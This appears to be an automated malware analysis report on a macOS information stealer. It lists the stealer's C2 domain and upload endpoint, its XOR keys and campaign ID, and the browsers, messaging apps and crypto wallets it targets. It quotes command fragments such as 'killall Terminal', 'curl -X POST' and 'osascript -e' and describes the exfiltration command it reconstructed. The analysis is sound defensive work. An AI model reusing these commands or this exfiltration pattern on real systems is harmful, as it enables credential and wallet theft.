← Back to Analyzer

Malware Analysis Report

MALICIOUS — 27/68 Engines
Sample ID
8ea963c0-0a81-4984-ac42-a7438e8fbad8
SHA-256
998c38b430097479b015a68d9435dc5b98684119739572a4dff11e085881187e
Analysis Date
2026-02-28 03:18 UTC
Sample Type
Mach-O Binary (macOS)

Executive Summary

This sample is a macOS information stealer flagged by 27 antivirus engines. It communicates with a dedicated command-and-control infrastructure centered on socifiapp.com, exfiltrating stolen data via HTTPS to /api/reports/upload on port 443. Analysis uncovered 14 cryptographic keys used for string obfuscation and data encryption, alongside 66 strings of interest revealing extensive browser credential harvesting capabilities targeting Chrome, Opera, Yandex, and associated extensions. The combination of encrypted strings, structured upload API endpoints, and broad browser targeting indicates a mature, actively maintained stealer toolkit designed for macOS environments.

Indicators of Compromise

C2 Infrastructure

  • https://socifiapp.com — Main C2 server, decrypted from rolling XOR config blob HIGH
  • socifiapp.com — Primary C2 domain HIGH
  • /api/reports/upload — Exfiltration endpoint via curl POST HIGH
  • https://socifiapp.com/api/reports/upload — Full C2 upload URL HIGH
  • 443 — HTTPS port MEDIUM

Encryption Keys

  • cefdf545d98403c5bf865e409e7499c6 — Primary XOR key
  • c39b9c8b0f22a7ef — Extended key word 3
  • 6bb78a3eb3c051e8 — Extended key word 4
  • c9100bc4952b4dbb — Rolling XOR key
  • badd9120b5ed6283 / e1848724abe66a89 / ad9cd524ade567b1

Notable Strings

  • killall Terminal — Anti-forensics
  • curl -X POST — Exfiltration method
  • osascript -e — AppleScript credential phishing
  • jhzhhfomng — Campaign / bot ID
  • ditto -c -k --sequesterRsrc — ZIP compression for exfil
  • xattr -c — Clear extended attributes

Targeted Applications

  • Google/Chrome, Opera, Yandex — Browser credentials
  • Telegram Desktop, Discord — Messaging data
  • Bitcoin, Litecoin, Exodus, Atomic, Monero, Dogecoin, Binance, Ledger, Trezor — Crypto wallets
  • Apple Notes — Local notes data

Analysis Reasoning Trail

Triage

Identified as Mach-O binary (application/x-mach-binary). VirusTotal flagged by 27 engines — routing to deep analysis.

Iteration 1–2

Decompiled entry point — discovered massive function with stack-based XOR decryption patterns. Identified first ciphertext block and key pair. Decrypted first string: killall Terminal passed to system().

Iteration 3–5

Mapped callgraph revealing fork/setsid (daemonization), 19 popen() calls, filesystem operations, and crypto capabilities. Found 1591 stack immediate assignments and 3257 XOR operations. Began systematic extraction of encrypted string blocks.

Iteration 6–8

Identified 223 consecutive assignment blocks. Discovered second encryption scheme: rolling XOR using embedded key rotating right by 1 bit per byte. Located encrypted config blob (316 bytes).

Iteration 9–10

Successfully decrypted rolling XOR config blob — revealed C2 URL https://socifiapp.com, campaign ID jhzhhfomng, targeted file types, and social engineering messages used for credential phishing.

Iteration 11–16

Built stack state machine to track key changes across the massive function. Decrypted 100+ strings revealing full target list: crypto wallets (Bitcoin, Exodus, Atomic, Monero, etc.), browsers (Chrome, Opera, Yandex), messaging apps (Telegram, Discord), and document grabber (pdf/txt/rtf).

Iteration 17–20

Manually decrypted critical C2 communication strings. Reconstructed full exfiltration command: curl -X POST to /api/reports/upload with user_id, build_tag, and report_file parameters. Finalized comprehensive IOC extraction.

Report generated by REActor automated analysis pipeline.